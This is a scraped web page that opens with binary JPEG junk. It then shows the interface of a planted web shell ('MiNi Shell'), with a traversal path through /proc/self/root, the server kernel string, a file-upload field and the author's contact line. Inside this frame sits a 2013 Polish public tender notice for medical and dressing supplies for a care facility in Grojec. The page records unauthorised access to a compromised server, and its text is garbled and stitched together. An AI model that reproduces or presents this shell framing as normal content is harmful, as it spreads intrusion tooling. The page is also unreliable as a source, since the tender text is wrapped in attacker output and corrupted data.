JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131107/453366-N-2013.html

<p class="kh_header"><b>Grojec: Dostawa artykułów medycznych i opatrunkowych dla pacjentów PZOL w Grojcu</b><br>
<b>Numer ogłoszenia: 453366 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu , Aleja Ogrodowa 1, 32-615 Grojec, woj. małopolskie, tel. 33 8428136, faks 33 8428903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzol.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów medycznych i opatrunkowych dla pacjentów PZOL w Grojcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA DO PRZETARGU NA ARTYKUŁY MEDYCZNE I OPATRUNKOWE 
Pakiet nr 1
ARTYKUŁY MEDYCZNE I OPATRUNKOWE
rękawice medyczne sterylne						
Rękawice lateksowe - do krótkich zabiegów pudrowane  w minimalnych ilościach dostępne w rozmiarach: 
nr 7 par 60	
nr 8 par 28			
Rękawice medyczne niesterylne						
Rękawice winylowe bezpudrowe lub z małą ilością pudru, dostępne w rozmiarach 
S op. 24	
M op.	1164			
L op.	36			
Opatrunki zwykłe						
Lignina w arkuszach 5 kg , celulozowa 100% ,bielona 40 cm x 60cm op.30			
Opaska elastyczna z zapinką do wielokrotnego użytku  10 cm x 5 m szt	12			
Opaska elastyczna z zapinką do wielokrotnego użytku                8 cm x 5 m 	szt		20			
Opaska dziana podtrzymująca 10cm x 4 m 	szt		50			
Opaska dziana podtrzymująca 5 cm x 4m 	szt		45			
Gaza kopertowa niejałowa 100cm x 100cm	szt		25			
Gaza kopertowa jałowa 100 cm x 100 cm	szt		30			
Kompresy gazowe niejałowe 10 cm x 10 cm - 100 sztuk	op		120			
Kompresy gazowe jałowe 5 cm x 5 cm w blistrach po 3 sztuki	szt		800			
Kompresy gazowe jałowe 10 cmx 10 cm w blistrach po 3 sztuki	szt		3500			
Wata opatrunkowa bawełniano-wiskozowa a 100,0 g	szt 	8			
Przylepce						
Przylepiec 5 cm x 5 m z włókniny, przeznaczony do mocowania opatrunków, tkaninowy ,bez gazy, hypoalergiczny o bardzo dobrej przylepności	
szt	50			
Elastyczna taśma samoprzylepna 20 cm x 10 m, niejałowa hypoalergiczna  o bardzo dobrej przylepności	szt		50			
Elastyczna taśma samoprzylepna 10 cm x 10 m, niejałowa hypoalergiczna  o bardzo dobrej przylepności	szt		65			
Opatrunek jałowy do mocowania kaniul dożylnych, obwodowych, hypoalergiczny, opakowanie zawiera 50 szt.	op		2			
Materiały medyczne różne						
Żel do EKG 500 ml	szt		2			
Papier do EKG 112mm x 25 mm	szt		10			
Patyczki higieniczne do uszu - 100 sztuk	op		20			
Worki na mocz sterylne - 2000 ml	szt		150			
Cewniki Foleya sterylne, dwudrożne, lateksowe, pokryte silikonem - roz CH 16	szt.30			
Cewniki Foleya sterylne, dwudrożne, lateksowe, pokryte silikonem - roz CH 18	szt		30			
Cewniki Foleya sterylne, dwudrożne, lateksowe, pokryte silikonem - roz CH 20	szt		20			
Cewniki do odsysania, sterylne
roz CH 10	szt 20
roz CH 14	szt		 80			
roz CH 16	szt		100			
roz CH 18	szt		100			
Zgłębnik żołądkowy - roz CH 14	szt		25			
Zgłębnik żołądkowy - roz CH 16	szt		25			
Zgłębnik żołądkowy - roz CH 18	szt		25			
Kaniule dożylne, do wkłuć obwodowych, kodowane kolorami:
zielony, szt	50 	
różowy, 	szt		100			
niebieski	szt		100			
Przyrząd do przetoczeń płynów infuzyjnych. sterylny	szt		450			
Igły jednorazowego użytku - nr 0,9	op		5			
Igły jednorazowego użytku - nr 0,8	op		7			
Igły jednorazowego użytku - nr 0,7	op		3			
Strzykawki jednorazowego użytku - nr 2	op		4			
Strzykawki jednorazowego użytku - nr 5	op		4			
Strzykawki jednorazowego użytku - nr 10	op		3			
Strzykawki jednorazowego użytku - nr 20	op		5			
Strzykawka Janeta 100 ml	szt		170			
Strzykawka Janeta 50 ml	szt		100			
Zestaw do irygacji lewatywa	szt		50			
Szpatułki drewniane - 100szt	op		2			
Kieliszki plastikowe czerwone - 80szt	op		5			
Kieliszki plastikowe niebieskie - 80szt	op		5			
Kieliszki plastikowe zielone - 80szt	op		5			
Kieliszki plastikowe bezbarwne - 80szt	op		5			
Pęsety jednorazowe, sterylne 	szt		100			
Aparat do pomiaru RR stanowiący połączenie antywstrząsowego systemu pomiarowego z tradycyjną formułą zegara,
Dane techniczne:  manometr spełniający normy AAMI dotyczące odporności na wstrząsy. obrotowy zawór spustowy, w komplecie mankiet standardowy, etui i stetoskop (osobno).	szt 		3			
Staza automatyczna 	szt		3			
Ostrza do skalpeli nr 15	op		1			
Medyczny termometr elektroniczny, bezkontaktowy, do pomiaru temperatury ciała człowieka( w okolicy tętnicy skroniowej), niezależnie od temperatury pokojowej, szybkie i niezawodne wyniki system  na podczerwień, sygnał dźwiękowy w przypadku podwyższonej temperatury, podświetlany wyświetlacz, zasilanie na baterie, automatyczne wyłączanie, pomiary w stopniach Celsjusza - zakres temperatur: 10 st.C - 40 st.C. Instrukcja po polsku.	szt		3			
Fartuch jednorazowy, foliowy, zakładany na szyję, wiązany z tyłu	szt		4000			
Czepek jednorazowy niejałowy z flizeliny, okrągły 	szt		50			
Maseczka jednorazowa na gumki, kształtka umożliwiająca dopasowanie do kształtu nosa a 50 szt 	op		1			
Maska tlenowa z drenem 2,1 m	szt		50			
Cewnik do podawania tlenu przez nos	szt		50			
Opaska identyfikacyjna dla dzieci i dorosłych , biała -100 szt op1					
Zestaw jednorazowy do nebulizacji	szt		15			
Rurki ustno-gardłowe, jednorazowe,  kodowane kolorami 
100 mm szt.8
90 mm szt. 4		
Rurka intubacyjna, dotchawicza, sterylna
nr 7   szt 1
nr 8	szt	1
Filtr antybakteryjny do worka samorozprężalnego (resuscytatora),sterylny	szt		10			
Aplikator/(aparat) do pobierania leków lub płynów infuzyjnych, z filtrem antybakteryjnym i zastawką, sterylny 	szt		50			
Koreczek jałowy, stosowany do zamknięcia wlotu kaniuli dożylnej (do wkłuć obwodowych), pakowany pojedynczo. Zapewnia uszczelnienie końcówek typu Luer.	szt.100			
	
Pakiet nr 2
PROBÓWKI DO BADAŃ - SYSTEM PRÓŻNIOWY  I  INNE POJEMNIKI
Probówki do surowicy, z przezroczystego tworzywa, na 4-5 ml  krwi, korek czerwony;   100 szt-1 op.	op.		4			
Probówki do hematologii, z przezroczystego tworzywa,               z EDTA, na 2-3ml krwi, korek jasnofioletowy lub różowy;   100 szt.-1op.	op.		3			
Probówki do koagulologii, z przezroczystego tworzywa             z 3,2% roztworem cytrynianu sodowego, na 2-2,7ml krwi, korek niebieski;100 szt.-1op.	op.2				
Probówki do oznaczania OB, z przezroczystego tworzywa, z 3,8% roztworem cytrynianu sodowego, korek czarny.   100 szt.-1op.
Do statywu  typu SED TAINER	op.		1			
Igły jednorazowe do uchwytu standardowego nr 
0,8, zielone z osłoną;   100 szt.-1op.	op.		2			
Igły jednorazowe do uchwytu standardowego nr 0,9, żółte, z osłoną;   100 szt.-1op.	op.		1			
Adapter z końcówką Luer, sterylny, z osłoną;   100 szt.-1op. op.1				
Pojemniki na badania						
Pojemniki na mocz - jałowe szt		100			
Pojemniki na mocz - niejałowe 	szt		150			
Pojemniki na kał 	szt		50.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje skorzystanie z prawa do udzielania z wolnej ręki zamówienia uzupełniającego na podstawie art.67 ust.1 pkt 7 ustawy PZP do 20% wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy dostaw polegającego na rozszerzeniu dostawy, jeżeli zmiana wykonawcy spowodowałaby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i dozorze</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku , uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku , uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku , uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku , uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania przez wykonawcę posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 50.000,00 zł-opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Umowę regulującą współpracę podmiotów występujących wspólnie (dotyczy spółki cywilnej i konsorcjum)- uwierzytelniona kserokopia-jeżeli dotyczy.
Wypełniony i podpisany przez osoby upoważnione formularz ofertowy- załącznik nr 2 do SIWZ    
Wypełniony i podpisany szczegółowy opis przedmiotu zamówienia-formularz cenowy- załącznik nr 1 do SIWZ.
Ewentualny dokument potwierdzający upoważnienie do składania oświadczeń woli w imieniu wykonawcy jeżeli upoważnienie to nie wynika z innego dokumentu.
Pełnomocnictwo dla osoby ustanowionej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dla reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykaz tych części zamówienia, których wykonanie wykonawca zamierza zlecić podwykonawcy wg załącznika nr 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany stawki VAT w przypadku zmiany przepisów podatkowych - jej zmiana nastąpi z dniem wejścia w życie aktu prawnego zmieniającego stawkę.
Nie wyczerpania przedmiotu umowy w terminie realizacji umowy. Na pisemny wniosek Zamawiającego zostanie zawarty aneks o przedłużeniu okresu obowiązywania umowy na warunkach z niej wynikających do czasu wskazanego przez zamawiającego nie później jednak niż do czasu wyczerpania asortymentu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzol.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZOL w Grojcu
Aleja Ogrodowa 1
32-615 Grojec
Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2013 godzina 10:00, miejsce: Dział Finansowy pokój nr 3 w PZOL w Grojcu Aleja Ogrodowa 1
32-615 Grojec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com